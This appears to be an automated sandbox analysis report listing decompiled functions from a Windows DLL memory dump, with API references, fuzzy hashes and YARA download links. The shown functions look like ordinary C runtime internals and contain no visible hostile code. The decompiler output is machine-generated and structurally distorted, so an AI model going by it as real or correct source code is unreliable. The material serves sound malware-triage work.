Associated: 00000002.00000002.998889318.000000006E821000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ef3d27d8f2b2bb4cf73e646795907a5ed71c9ba71e34e319406929f63def1461
Instruction ID: e10a0ab8026179b3c460b52ef98d413799cc6b601ff7acc75f8013e0afbbdabf
Opcode Fuzzy Hash: ef3d27d8f2b2bb4cf73e646795907a5ed71c9ba71e34e319406929f63def1461
Instruction Fuzzy Hash: 08C1B27494424ADFEB41CFE9CDA4BEDBBB4AF0A314F044D85E814AB391E7709941CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 6E7FB501, Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 266
COMMON

Download Yara Rule

C-Code - Quality: 74%

			E6E7FB501(void* __ecx, void* __edx, void* __eflags, intOrPtr _a4, signed int _a8, intOrPtr _a12) {
				signed int _v8;
				void** _v12;
				struct _STARTUPINFOW* _v28;
				short _v270;
				short _v272;
				char _v528;
				char _v700;
				signed int _v704;
				short _v706;
				signed int* _v708;
				signed int _v712;
				signed int _v716;
				signed int _v720;
				signed int* _v724;
				signed int _v728;
				signed int _v732;
				signed int _v736;
				signed int _v740;
				signed int _v744;
				short _v802;
				char _v852;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t167;
				void* _t174;
				signed int _t175;
				signed int _t176;
				intOrPtr _t177;
				signed int _t180;
				signed int _t184;
				signed int _t185;
				struct _STARTUPINFOW* _t187;
				signed int _t191;
				void** _t192;
				signed int _t198;
				signed int _t201;
				signed int _t202;
				signed int _t204;
				signed int _t224;
				signed int _t225;
				signed int _t228;
				signed int _t233;
				signed int _t236;
				LPWSTR* _t238;
				intOrPtr* _t244;
				intOrPtr* _t245;
				void* _t256;
				signed int _t260;
				signed int _t263;
				intOrPtr* _t264;
				signed int _t266;
				signed int* _t270;
				void* _t278;
				signed char _t279;
				signed int _t281;
				signed int _t282;
				intOrPtr _t284;
				signed int _t286;
				signed int _t291;
				signed int _t293;
				signed int _t295;
				signed int _t299;
				signed int* _t300;
				intOrPtr* _t301;
				short _t302;
				signed int _t303;
				void* _t305;
				void* _t306;
				void* _t307;

				_t167 =  *0x6e81e008; // 0x77dcee0d
				_v8 = _t167 ^ _t303;
				_t236 = _a8;
				_t284 = _a4;
				_v736 = _t236;
				_v724 = E6E7F9964(_t236, __ecx, __edx) + 0x278;
				_push( &_v712);
				_t174 = E6E7FAC46(_t236, __edx, _t284, _a12, _a12,  &_v272, 0x83,  &_v700, 0x55);
				_t306 = _t305 + 0x18;
				if(_t174 != 0) {
					_t11 = _t236 + 2; // 0x6
					_t291 = _t11 << 4;
					__eflags = _t291;
					_t175 =  &_v272;
					_v716 = _t291;
					_t244 =  *((intOrPtr*)(_t291 + _t284));
					while(1) {
						_v704 = _v704 & 0x00000000;
						__eflags =  *_t175 -  *_t244;
						_t293 = _v716;
						if( *_t175 !=  *_t244) {
							break;
						}
						__eflags =  *_t175;
						if( *_t175 == 0) {
							L8:
							_t176 = _v704;
						} else {
							_t302 =  *((intOrPtr*)(_t175 + 2));
							__eflags = _t302 -  *((intOrPtr*)(_t244 + 2));
							_v706 = _t302;
							_t293 = _v716;
							if(_t302 !=  *((intOrPtr*)(_t244 + 2))) {
								break;
							} else {
								_t175 = _t175 + 4;
								_t244 = _t244 + 4;
								__eflags = _v706;
								if(_v706 != 0) {
									continue;
								} else {
									goto L8;
								}
							}
						}
						L10:
						__eflags = _t176;
						if(_t176 != 0) {
							_t245 =  &_v272;
							_t278 = _t245 + 2;
							do {
								_t177 =  *_t245;
								_t245 = _t245 + 2;
								__eflags = _t177 - _v704;
							} while (_t177 != _v704);
							_v720 = (_t245 - _t278 >> 1) + 1;
							_t180 = E6E7F92A2(_t245 - _t278 >> 1, 4 + ((_t245 - _t278 >> 1) + 1) * 2);
							_v732 = _t180;
							__eflags = _t180;
							if(_t180 == 0) {
								goto L1;
							} else {
								_v728 =  *((intOrPtr*)(_t293 + _t284));
								_t35 = _t236 * 4; // 0xb0f2e808
								_v740 =  *((intOrPtr*)(_t284 + _t35 + 0xa0));
								_t38 = _t284 + 8; // 0x8b55ff8b
								_v744 =  *_t38;
								_t254 =  &_v272;
								_v708 = _t180 + 4;
								_t184 = E6E7F5B80(_t180 + 4, _v720,  &_v272);
								_t307 = _t306 + 0xc;
								__eflags = _t184;
								if(_t184 != 0) {
									_t185 = _v704;
									_push(_t185);
									_push(_t185);
									_push(_t185);
									_push(_t185);
									_push(_t185);
									E6E7EE603();
									asm("int3");
									_push(_t303);
									_t187 =  &_v852;
									GetStartupInfoW(_t187);
									__eflags = _v802;
									if(_v802 != 0) {
										_t187 = _v28;
										__eflags = _t187;
										if(_t187 != 0) {
											_push(_t236);
											_push(_t293);
											_t295 = _t187->cb;
											_t238 =  &(_t187->lpReserved);
											_v12 = _t238 + _t295;
											__eflags = _t295 - 0x2000;
											if(_t295 >= 0x2000) {
												_t295 = 0x2000;
											}
											_push(_t295);
											E6E805A6A();
											_t191 =  *0x6e820288; // 0x40
											__eflags = _t295 - _t191;
											if(_t295 > _t191) {
												_t295 = _t191;
											}
											_push(_t284);
											_t286 = 0;
											__eflags = _t295;
											if(_t295 == 0) {
												L62:
												return _t191;
											} else {
												_t192 = _v12;
												do {
													_t256 =  *_t192;
													__eflags = _t256 - 0xffffffff;
													if(_t256 == 0xffffffff) {
														goto L61;
													}
													__eflags = _t256 - 0xfffffffe;
													if(_t256 == 0xfffffffe) {
														goto L61;
													}
													_t279 =  *_t238;
													__eflags = _t279 & 0x00000001;
													if((_t279 & 0x00000001) == 0) {
														goto L61;
													}
													__eflags = _t279 & 0x00000008;
													if((_t279 & 0x00000008) != 0) {
														L59:
														_t281 = (_t286 & 0x0000003f) * 0x30 +  *((intOrPtr*)(0x6e820088 + (_t286 >> 6) * 4));
														__eflags = _t281;
														 *(_t281 + 0x18) =  *_v12;
														 *((char*)(_t281 + 0x28)) =  *_t238;
														L60:
														_t192 = _v12;
														goto L61;
													}
													_t198 = GetFileType(_t256);
													__eflags = _t198;
													if(_t198 == 0) {
														goto L60;
													}
													goto L59;
													L61:
													_t286 = _t286 + 1;
													_t192 =  &(_t192[1]);
													_t238 =  &(_t238[0]);
													_v12 = _t192;
													__eflags = _t286 - _t295;
												} while (_t286 != _t295);
												goto L62;
											}
										}
									}
									return _t187;
								} else {
									__eflags = _v272 - 0x43;
									 *((intOrPtr*)(_t293 + _t284)) = _v708;
									if(_v272 != 0x43) {
										L19:
										_t201 = E6E7FA9F0(_t236, _t254, _t284,  &_v700);
										_t260 = _v704;
										 *(_t284 + 0xa0 + _t236 * 4) = _t201;
									} else {
										__eflags = _v270;
										if(_v270 != 0) {
											goto L19;
										} else {
											_t260 = _v704;
											 *(_t284 + 0xa0 + _t236 * 4) = _t260;
										}
									}
									__eflags = _t236 - 2;
									if(_t236 != 2) {
										__eflags = _t236 - 1;
										if(_t236 != 1) {
											__eflags = _t236 - 5;
											if(_t236 == 5) {
												 *((intOrPtr*)(_t284 + 0x14)) = _v712;
											}
										} else {
											 *((intOrPtr*)(_t284 + 0x10)) = _v712;
										}
									} else {
										_t300 = _v724;
										_t282 = _t260;
										_t270 = _t300;
										 *(_t284 + 8) = _v712;
										_v708 = _t300;
										_v720 = _t300[8];
										_v712 = _t300[9];
										while(1) {
											_t64 = _t284 + 8; // 0x8b55ff8b
											__eflags =  *_t64 -  *_t270;
											if( *_t64 ==  *_t270) {
												break;
											}
											_t301 = _v708;
											_t282 = _t282 + 1;
											_t233 =  *_t270;
											 *_t301 = _v720;
											_v712 = _t270[1];
											_t270 = _t301 + 8;
											 *((intOrPtr*)(_t301 + 4)) = _v712;
											_t236 = _v736;
											_t300 = _v724;
											_v720 = _t233;
											_v708 = _t270;
											__eflags = _t282 - 5;
											if(_t282 < 5) {
												continue;
											} else {
											}
											L27:
											__eflags = _t282 - 5;
											if(__eflags == 0) {
												_t88 = _t284 + 8; // 0x8b55ff8b
												_t224 = E6E7FE9FD(_t236, _t284, _t300, __eflags, _v704, 1, 0x6e80f850, 0x7f,  &_v528,  *_t88, 1);
												_t307 = _t307 + 0x1c;
												__eflags = _t224;
												_t225 = _v704;
												if(_t224 == 0) {
													_t300[1] = _t225;
												} else {
													do {
														 *(_t303 + _t225 * 2 - 0x20c) =  *(_t303 + _t225 * 2 - 0x20c) & 0x000001ff;
														_t225 = _t225 + 1;
														__eflags = _t225 - 0x7f;
													} while (_t225 < 0x7f);
													_t228 = E6E7E996D(_t284,  &_v528,  *0x6e81e1e4, 0xfe);
													_t307 = _t307 + 0xc;
													__eflags = _t228;
													_t300[1] = 0 | _t228 == 0x00000000;
												}
												_t103 = _t284 + 8; // 0x8b55ff8b
												 *_t300 =  *_t103;
											}
											 *(_t284 + 0x18) = _t300[1];
											goto L38;
										}
										__eflags = _t282;
										if(_t282 != 0) {
											 *_t300 =  *(_t300 + _t282 * 8);
											_t300[1] =  *(_t300 + 4 + _t282 * 8);
											 *(_t300 + _t282 * 8) = _v720;
											 *(_t300 + 4 + _t282 * 8) = _v712;
										}
										goto L27;
									}
									L38:
									_t202 = _t236 * 0xc;
									_t110 = _t202 + 0x6e80f790; // 0x6e7e1ef0
									 *0x6e80a2fc(_t284);
									_t204 =  *((intOrPtr*)( *_t110))();
									_t263 = _v728;
									__eflags = _t204;
									if(_t204 == 0) {
										__eflags = _t263 - 0x6e81e2b0;
										if(_t263 != 0x6e81e2b0) {
											_t299 = _t236 + _t236;
											__eflags = _t299;
											asm("lock xadd [eax], ecx");
											if(_t299 != 0) {
												goto L43;
											} else {
												_t128 = _t299 * 8; // 0x33047255
												E6E7F9268( *((intOrPtr*)(_t284 + _t128 + 0x28)));
												_t131 = _t299 * 8; // 0xfb835959
												E6E7F9268( *((intOrPtr*)(_t284 + _t131 + 0x24)));
												_t134 = _t236 * 4; // 0xb0f2e808
												E6E7F9268( *((intOrPtr*)(_t284 + _t134 + 0xa0)));
												_t266 = _v704;
												 *((intOrPtr*)(_v716 + _t284)) = _t266;
												 *(_t284 + 0xa0 + _t236 * 4) = _t266;
											}
										}
										_t264 = _v732;
										 *_t264 = 1;
										 *((intOrPtr*)(_t284 + 0x28 + (_t236 + _t236) * 8)) = _t264;
									} else {
										 *(_v716 + _t284) = _t263;
										_t115 = _t236 * 4; // 0xb0f2e808
										E6E7F9268( *((intOrPtr*)(_t284 + _t115 + 0xa0)));
										 *(_t284 + 0xa0 + _t236 * 4) = _v740;
										E6E7F9268(_v732);
										 *(_t284 + 8) = _v744;
										goto L1;
									}
									goto L2;
								}
							}
						} else {
							goto L2;
						}
						goto L64;
					}
					asm("sbb eax, eax");
					_t176 = _t175 | 0x00000001;
					__eflags = _t176;
					goto L10;
				} else {
					L1:
					L2:
					return E6E7E440A(_v8 ^ _t303);
				}
				L64:
			}

0x6e7fb50c
0x6e7fb513
0x6e7fb517
0x6e7fb51f
0x6e7fb522
0x6e7fb532
0x6e7fb53e
0x6e7fb555
0x6e7fb55a
0x6e7fb55f
0x6e7fb574
0x6e7fb577
0x6e7fb577
0x6e7fb57a
0x6e7fb580
0x6e7fb589
0x6e7fb58b
0x6e7fb58e
0x6e7fb595
0x6e7fb598
0x6e7fb59e
0x00000000
0x00000000
0x6e7fb5a0
0x6e7fb5a4
0x6e7fb5cd
0x6e7fb5cd
0x6e7fb5a6
0x6e7fb5a6
0x6e7fb5aa
0x6e7fb5ae
0x6e7fb5b5
0x6e7fb5bb
0x00000000
0x6e7fb5bd
0x6e7fb5bd
0x6e7fb5c0
0x6e7fb5c3
0x6e7fb5cb
0x00000000
0x00000000
0x00000000
0x00000000
0x6e7fb5cb
0x6e7fb5bb
0x6e7fb5da
0x6e7fb5da
0x6e7fb5dc
0x6e7fb5e2
0x6e7fb5e8
0x6e7fb5eb
0x6e7fb5eb
0x6e7fb5ee
0x6e7fb5f1
0x6e7fb5f1
0x6e7fb601
0x6e7fb60f
0x6e7fb614
0x6e7fb61b
0x6e7fb61d
0x00000000
0x6e7fb623
0x6e7fb629
0x6e7fb62f
0x6e7fb636
0x6e7fb63c
0x6e7fb63f
0x6e7fb645
0x6e7fb652
0x6e7fb659
0x6e7fb65e
0x6e7fb661
0x6e7fb663
0x6e7fb8bc
0x6e7fb8c2
0x6e7fb8c3
0x6e7fb8c4
0x6e7fb8c5
0x6e7fb8c6
0x6e7fb8c7
0x6e7fb8cc
0x6e7fb8cf
0x6e7fb8d5
0x6e7fb8d9
0x6e7fb8df
0x6e7fb8e4
0x6e7fb8ea
0x6e7fb8ed
0x6e7fb8ef
0x6e7fb8f5
0x6e7fb8f6
0x6e7fb8f7
0x6e7fb8f9
0x6e7fb8ff
0x6e7fb907
0x6e7fb909
0x6e7fb90b
0x6e7fb90b
0x6e7fb90d
0x6e7fb90e
0x6e7fb913
0x6e7fb919
0x6e7fb91b
0x6e7fb91d
0x6e7fb91d
0x6e7fb91f
0x6e7fb920
0x6e7fb922
0x6e7fb924
0x6e7fb97c
0x00000000
0x6e7fb926
0x6e7fb926
0x6e7fb929
0x6e7fb929
0x6e7fb92b
0x6e7fb92e
0x00000000
0x00000000
0x6e7fb930
0x6e7fb933
0x00000000
0x00000000
0x6e7fb935
0x6e7fb937
0x6e7fb93a
0x00000000
0x00000000
0x6e7fb93c
0x6e7fb93f
0x6e7fb94c
0x6e7fb95c
0x6e7fb95c
0x6e7fb965
0x6e7fb96a
0x6e7fb96d
0x6e7fb96d
0x00000000
0x6e7fb96d
0x6e7fb942
0x6e7fb948
0x6e7fb94a
0x00000000
0x00000000
0x00000000
0x6e7fb970
0x6e7fb970
0x6e7fb971
0x6e7fb974
0x6e7fb975
0x6e7fb978
0x6e7fb978
0x00000000
0x6e7fb929
0x6e7fb924
0x6e7fb8ef
0x6e7fb982
0x6e7fb669
0x6e7fb669
0x6e7fb677
0x6e7fb67a
0x6e7fb695
0x6e7fb69c
0x6e7fb6a2
0x6e7fb6a8
0x6e7fb67c
0x6e7fb67c
0x6e7fb684
0x00000000
0x6e7fb686
0x6e7fb686
0x6e7fb68c
0x6e7fb68c
0x6e7fb684
0x6e7fb6af
0x6e7fb6b2
0x6e7fb7cf
0x6e7fb7d2
0x6e7fb7df
0x6e7fb7e2
0x6e7fb7ea
0x6e7fb7ea
0x6e7fb7d4
0x6e7fb7da
0x6e7fb7da
0x6e7fb6b8
0x6e7fb6b8
0x6e7fb6be
0x6e7fb6c6
0x6e7fb6c8
0x6e7fb6cb
0x6e7fb6d4
0x6e7fb6dd
0x6e7fb6e3
0x6e7fb6e3
0x6e7fb6e6
0x6e7fb6e8
0x00000000
0x00000000
0x6e7fb6ea
0x6e7fb6f0
0x6e7fb6f1
0x6e7fb6fc
0x6e7fb704
0x6e7fb70c
0x6e7fb70f
0x6e7fb712
0x6e7fb718
0x6e7fb71e
0x6e7fb724
0x6e7fb72a
0x6e7fb72d
0x00000000
0x00000000
0x6e7fb72f
0x6e7fb754
0x6e7fb754
0x6e7fb757
0x6e7fb75b
0x6e7fb774
0x6e7fb779
0x6e7fb77c
0x6e7fb77e
0x6e7fb784
0x6e7fb7bf
0x6e7fb786
0x6e7fb786
0x6e7fb78b
0x6e7fb793
0x6e7fb794
0x6e7fb794
0x6e7fb7ab
0x6e7fb7b2
0x6e7fb7b5
0x6e7fb7ba
0x6e7fb7ba
0x6e7fb7c2
0x6e7fb7c5
0x6e7fb7c5
0x6e7fb7ca
0x00000000
0x6e7fb7ca
0x6e7fb731
0x6e7fb733
0x6e7fb738
0x6e7fb73e
0x6e7fb747
0x6e7fb750
0x6e7fb750
0x00000000
0x6e7fb733
0x6e7fb7ed
0x6e7fb7ed
0x6e7fb7f1
0x6e7fb7f9
0x6e7fb7ff
0x6e7fb802
0x6e7fb808
0x6e7fb80a
0x6e7fb84a
0x6e7fb850
0x6e7fb857
0x6e7fb857
0x6e7fb85d
0x6e7fb861
0x00000000
0x6e7fb863
0x6e7fb863
0x6e7fb867
0x6e7fb86c
0x6e7fb870
0x6e7fb875
0x6e7fb87c
0x6e7fb88a
0x6e7fb890
0x6e7fb893
0x6e7fb893
0x6e7fb861
0x6e7fb8a2
0x6e7fb8aa
0x6e7fb8b3
0x6e7fb80c
0x6e7fb812
0x6e7fb815
0x6e7fb81c
0x6e7fb82e
0x6e7fb835
0x6e7fb842
0x00000000
0x6e7fb842
0x00000000
0x6e7fb80a
0x6e7fb663
0x6e7fb5de
0x00000000
0x6e7fb5de
0x00000000
0x6e7fb5dc
0x6e7fb5d5
0x6e7fb5d7
0x6e7fb5d7
0x00000000
0x6e7fb561
0x6e7fb561
0x6e7fb563
0x6e7fb573
0x6e7fb573
0x00000000

APIs

Part of subcall function 6E7F9964: GetLastError.KERNEL32(000000FF,ios_base::failbit set,6E7EE3E6,6E81BFB8,0000000C,00000004,00000001,00000004,?,6E7D46B5,00000000,00000000), ref: 6E7F9968
Part of subcall function 6E7F9964: SetLastError.KERNEL32(00000000,FFFFFFFF,000000FF,?,6E7D46B5,00000000,00000000), ref: 6E7F9A0C
Part of subcall function 6E7F9964: _abort.LIBCMT ref: 6E7F9A12

_memcmp.LIBVCRUNTIME ref: 6E7FB7AB
_free.LIBCMT ref: 6E7FB81C
_free.LIBCMT ref: 6E7FB835
_free.LIBCMT ref: 6E7FB867
_free.LIBCMT ref: 6E7FB870
_free.LIBCMT ref: 6E7FB87C

Strings

C, xrefs: 6E7FB669

Memory Dump Source

Source File: 00000002.00000002.998800576.000000006E7D1000.00000020.00020000.sdmp, Offset: 6E7D0000, based on PE: true

Associated: 00000002.00000002.998796126.000000006E7D0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.998846427.000000006E80A000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.998866776.000000006E81E000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.998889318.000000006E821000.00000002.00020000.sdmp Download File

Similarity

API ID: _free$ErrorLast$_abort_memcmp
String ID: C
API String ID: 1679612858-1037565863
Opcode ID: 2ba463fd3399a88187ed9a4be927515f321b96bf3165f38b354013581ebc782e
Instruction ID: eee018b993f66fafaf903336f8f541d48170d2d4b809deb5aab6c5b67840fa4f
Opcode Fuzzy Hash: 2ba463fd3399a88187ed9a4be927515f321b96bf3165f38b354013581ebc782e
Instruction Fuzzy Hash: 73B14875A0521ADFDB24DFA8C988A9DB7B4FF48304F1045EAD809A7364D730AE91CF80

Uniqueness

Uniqueness Score: -1.00%

Function 6E7F9964, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 65
COMMON

Download Yara Rule

C-Code - Quality: 77%

			E6E7F9964(void* __ebx, void* __ecx, void* __edx) {
				void* __edi;
				void* __esi;
				intOrPtr _t2;
				long _t3;
				intOrPtr _t5;
				long _t6;
				intOrPtr _t9;
				long _t10;
				long _t12;
				void* _t38;
				void* _t41;
				void* _t43;
				void* _t47;
				long _t48;
				long _t49;
				long _t53;
				long _t54;
				void* _t58;

				_t47 = __edx;
				_t41 = __ecx;
				_t38 = __ebx;
				_push(_t48);
				_t53 = GetLastError();
				_t2 =  *0x6e81e1e0; // 0xffffffff
				_t60 = _t2 - 0xffffffff;
				if(_t2 == 0xffffffff) {
					L5:
					_t3 = E6E7FD972(_t41, _t53, __eflags, _t2, 0xffffffff);
					__eflags = _t3;
					if(_t3 == 0) {
						goto L14;
					} else {
						_t48 = E6E7FC3A0(_t41, 1, 0x364);
						_pop(_t41);
						__eflags = _t48;
						if(__eflags != 0) {
							__eflags = E6E7FD972(_t41, _t53, __eflags,  *0x6e81e1e0, _t48);
							if(__eflags != 0) {
								E6E7F97AA(_t41, _t48, 0x6e820080);
								E6E7F9268(0);
								_t58 = _t58 + 0xc;
								goto L12;
							} else {
								E6E7FD972(_t41, _t53, __eflags,  *0x6e81e1e0, _t30);
								_push(_t48);
								goto L8;
							}
						} else {
							E6E7FD972(_t41, _t53, __eflags,  *0x6e81e1e0, _t29);
							_push(_t48);
							L8:
							E6E7F9268();
							_pop(_t41);
							goto L14;
						}
					}
				} else {
					_t48 = E6E7FD91C(_t41, _t53, _t60, _t2);
					if(_t48 == 0) {
						_t2 =  *0x6e81e1e0; // 0xffffffff
						goto L5;
					} else {
						if(_t48 != 0xffffffff) {
							L12:
							__eflags = _t48;
							if(_t48 == 0) {
								goto L14;
							} else {
								SetLastError(_t53);
								return _t48;
							}
						} else {
							L14:
							SetLastError(_t53);
							E6E7F8C69(_t38, _t47, _t48, _t53);
							asm("int3");
							_t5 =  *0x6e81e1e0; // 0xffffffff
							_push(_t53);
							_t63 = _t5 - 0xffffffff;
							if(_t5 == 0xffffffff) {
								L20:
								_t6 = E6E7FD972(_t41, _t53, __eflags, _t5, 0xffffffff);
								__eflags = _t6;
								if(_t6 == 0) {
									goto L29;
								} else {
									_t53 = E6E7FC3A0(_t41, 1, 0x364);
									_pop(_t41);
									__eflags = _t53;
									if(__eflags != 0) {
										__eflags = E6E7FD972(_t41, _t53, __eflags,  *0x6e81e1e0, _t53);
										if(__eflags != 0) {
											E6E7F97AA(_t41, _t53, 0x6e820080);
											E6E7F9268(0);
											_t58 = _t58 + 0xc;
											goto L27;
										} else {
											E6E7FD972(_t41, _t53, __eflags,  *0x6e81e1e0, _t21);
											_push(_t53);
											goto L23;
										}
									} else {
										E6E7FD972(_t41, _t53, __eflags,  *0x6e81e1e0, _t20);
										_push(_t53);
										L23:
										E6E7F9268();
										_pop(_t41);
										goto L29;
									}
								}
							} else {
								_t53 = E6E7FD91C(_t41, _t53, _t63, _t5);
								if(_t53 == 0) {
									_t5 =  *0x6e81e1e0; // 0xffffffff
									goto L20;
								} else {
									if(_t53 != 0xffffffff) {
										L27:
										__eflags = _t53;
										if(_t53 == 0) {
											goto L29;
										} else {
											return _t53;
										}
									} else {
										L29:
										E6E7F8C69(_t38, _t47, _t48, _t53);
										asm("int3");
										_push(_t38);
										_push(_t53);
										_push(_t48);
										_t54 = GetLastError();
										_t9 =  *0x6e81e1e0; // 0xffffffff
										_t66 = _t9 - 0xffffffff;
										if(_t9 == 0xffffffff) {
											L36:
											_t10 = E6E7FD972(_t41, _t54, __eflags, _t9, 0xffffffff);
											__eflags = _t10;
											if(_t10 == 0) {
												goto L33;
											} else {
												_t12 = E6E7FC3A0(_t41, 1, 0x364); // executed
												_pop(_t43);
												_t49 = _t12;
												__eflags = _t49;
												if(__eflags != 0) {
													__eflags = E6E7FD972(_t43, _t54, __eflags,  *0x6e81e1e0, _t49);
													if(__eflags != 0) {
														E6E7F97AA(_t43, _t49, 0x6e820080);
														E6E7F9268(0);
														goto L43;
													} else {
														E6E7FD972(_t43, _t54, __eflags,  *0x6e81e1e0, 0);
														_push(_t49);
														goto L39;
													}
												} else {
													E6E7FD972(_t43, _t54, __eflags,  *0x6e81e1e0, 0);
													_push(0);
													L39:
													E6E7F9268();
													goto L33;
												}
											}
										} else {
											_t49 = E6E7FD91C(_t41, _t54, _t66, _t9);
											if(_t49 == 0) {
												_t9 =  *0x6e81e1e0; // 0xffffffff
												goto L36;
											} else {
												if(_t49 != 0xffffffff) {
													L43:
													__eflags = _t49;
													if(_t49 == 0) {
														goto L33;
													} else {
														SetLastError(_t54);
													}
												} else {
													L33:
													SetLastError(_t54);
													_t49 = 0;
												}
											}
										}
										return _t49;
									}
								}
							}
						}
					}
				}
			}

0x6e7f9964
0x6e7f9964
0x6e7f9964
0x6e7f9967
0x6e7f996e
0x6e7f9970
0x6e7f9975
0x6e7f9978
0x6e7f9992
0x6e7f9995
0x6e7f999a
0x6e7f999c
0x00000000
0x6e7f999e
0x6e7f99aa
0x6e7f99ad
0x6e7f99ae
0x6e7f99b0
0x6e7f99d3
0x6e7f99d5
0x6e7f99ec
0x6e7f99f3
0x6e7f99f8
0x00000000
0x6e7f99d7
0x6e7f99de
0x6e7f99e3
0x00000000
0x6e7f99e3
0x6e7f99b2
0x6e7f99b9
0x6e7f99be
0x6e7f99bf
0x6e7f99bf
0x6e7f99c4
0x00000000
0x6e7f99c4
0x6e7f99b0
0x6e7f997a
0x6e7f9980
0x6e7f9984
0x6e7f998d
0x00000000
0x6e7f9986
0x6e7f9989
0x6e7f99fb
0x6e7f99fb
0x6e7f99fd
0x00000000
0x6e7f99ff
0x6e7f9a00
0x6e7f9a0a
0x6e7f9a0a
0x6e7f998b
0x6e7f9a0b
0x6e7f9a0c
0x6e7f9a12
0x6e7f9a17
0x6e7f9a18
0x6e7f9a1d
0x6e7f9a1e
0x6e7f9a21
0x6e7f9a3b
0x6e7f9a3e
0x6e7f9a43
0x6e7f9a45
0x00000000
0x6e7f9a47
0x6e7f9a53
0x6e7f9a56
0x6e7f9a57
0x6e7f9a59
0x6e7f9a7c
0x6e7f9a7e
0x6e7f9a95
0x6e7f9a9c
0x6e7f9aa1
0x00000000
0x6e7f9a80
0x6e7f9a87
0x6e7f9a8c
0x00000000
0x6e7f9a8c
0x6e7f9a5b
0x6e7f9a62
0x6e7f9a67
0x6e7f9a68
0x6e7f9a68
0x6e7f9a6d
0x00000000
0x6e7f9a6d
0x6e7f9a59
0x6e7f9a23
0x6e7f9a29
0x6e7f9a2d
0x6e7f9a36
0x00000000
0x6e7f9a2f
0x6e7f9a32
0x6e7f9aa4
0x6e7f9aa4
0x6e7f9aa6
0x00000000
0x6e7f9aa8
0x6e7f9aab
0x6e7f9aab
0x6e7f9a34
0x6e7f9aac
0x6e7f9aac
0x6e7f9ab1
0x6e7f9ab4
0x6e7f9ab5
0x6e7f9ab6
0x6e7f9abd
0x6e7f9ac1
0x6e7f9ac6
0x6e7f9ac9
0x6e7f9af0
0x6e7f9af3
0x6e7f9af8
0x6e7f9afa
0x00000000
0x6e7f9afc
0x6e7f9b03
0x6e7f9b09
0x6e7f9b0a
0x6e7f9b0c
0x6e7f9b0e
0x6e7f9b31
0x6e7f9b33
0x6e7f9b4a
0x6e7f9b50
0x00000000
0x6e7f9b35
0x6e7f9b3c
0x6e7f9b41
0x00000000
0x6e7f9b41
0x6e7f9b10
0x6e7f9b17
0x6e7f9b1c
0x6e7f9b1d
0x6e7f9b1d
0x00000000
0x6e7f9b22
0x6e7f9b0e
0x6e7f9acb
0x6e7f9ad1
0x6e7f9ad5
0x6e7f9aeb
0x00000000
0x6e7f9ad7
0x6e7f9ada
0x6e7f9b58
0x6e7f9b58
0x6e7f9b5a
0x00000000
0x6e7f9b5c
0x6e7f9b5d
0x6e7f9b5d
0x6e7f9adc
0x6e7f9adc
0x6e7f9add
0x6e7f9ae3
0x6e7f9ae3
0x6e7f9ada
0x6e7f9ad5
0x6e7f9aea
0x6e7f9aea
0x6e7f9a32
0x6e7f9a2d
0x6e7f9a21
0x6e7f9989
0x6e7f9984

APIs

GetLastError.KERNEL32(000000FF,ios_base::failbit set,6E7EE3E6,6E81BFB8,0000000C,00000004,00000001,00000004,?,6E7D46B5,00000000,00000000), ref: 6E7F9968
_free.LIBCMT ref: 6E7F99BF
_free.LIBCMT ref: 6E7F99F3
SetLastError.KERNEL32(00000000,?,?,?,00000000,FFFFFFFF,000000FF,?,6E7D46B5,00000000,00000000), ref: 6E7F9A00
SetLastError.KERNEL32(00000000,FFFFFFFF,000000FF,?,6E7D46B5,00000000,00000000), ref: 6E7F9A0C
_abort.LIBCMT ref: 6E7F9A12

Strings

ios_base::failbit set, xrefs: 6E7F9966

Memory Dump Source

Source File: 00000002.00000002.998800576.000000006E7D1000.00000020.00020000.sdmp, Offset: 6E7D0000, based on PE: true

Associated: 00000002.00000002.998796126.000000006E7D0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.998846427.000000006E80A000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.998866776.000000006E81E000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.998889318.000000006E821000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorLast$_free$_abort
String ID: ios_base::failbit set
API String ID: 3160817290-3924258884
Opcode ID: ed9fe0fdb00780912e4f0103364eca930af6d71b6a91f0bd0439be613e67fa9b
Instruction ID: bc5a8574010186b9676d439b0ca3ba56b6d8e411cfcc5ac2e3c9c7dd22408560
Opcode Fuzzy Hash: ed9fe0fdb00780912e4f0103364eca930af6d71b6a91f0bd0439be613e67fa9b
Instruction Fuzzy Hash: 22110831114902EADB42DEF94F08F9A312DAFD2775B154B25F529927F4DF208907CAA1

Uniqueness

Uniqueness Score: -1.00%

Function 6E7FEB1A, Relevance: 12.2, APIs: 8, Instructions: 216
COMMON

Download Yara Rule

C-Code - Quality: 65%

			E6E7FEB1A(void* __ebx, void* __ecx, void* __edi, void* __esi, intOrPtr* _a4, intOrPtr _a8, signed int _a12, char* _a16, int _a20, intOrPtr _a24, intOrPtr _a28, int _a32, intOrPtr _a36) {
				signed int _v8;
				int _v12;
				void* _v24;
				signed int _t49;
				signed int _t54;
				signed int _t60;
				int _t64;
				intOrPtr _t70;
				int _t71;
				int _t78;
				short* _t81;
				void* _t95;
				void* _t96;
				int _t98;
				short* _t101;
				int _t103;
				signed int _t106;
				short* _t107;
				void* _t110;

				_push(__ecx);
				_push(__ecx);
				_t49 =  *0x6e81e008; // 0x77dcee0d
				_v8 = _t49 ^ _t106;
				_push(__esi);
				_t103 = _a20;
				if(_t103 > 0) {
					_t78 = E6E7F8CAC(_a16, _t103);
					_t110 = _t78 - _t103;
					_t4 = _t78 + 1; // 0x1
					_t103 = _t4;
					if(_t110 >= 0) {
						_t103 = _t78;
					}
				}
				_t98 = _a32;
				if(_t98 == 0) {
					_t98 =  *( *_a4 + 8);
					_a32 = _t98;
				}
				_t54 = MultiByteToWideChar(_t98, 1 + (0 | _a36 != 0x00000000) * 8, _a16, _t103, 0, 0);
				_v12 = _t54;
				if(_t54 == 0) {
					L38:
					return E6E7E440A(_v8 ^ _t106);
				} else {
					_t95 = _t54 + _t54;
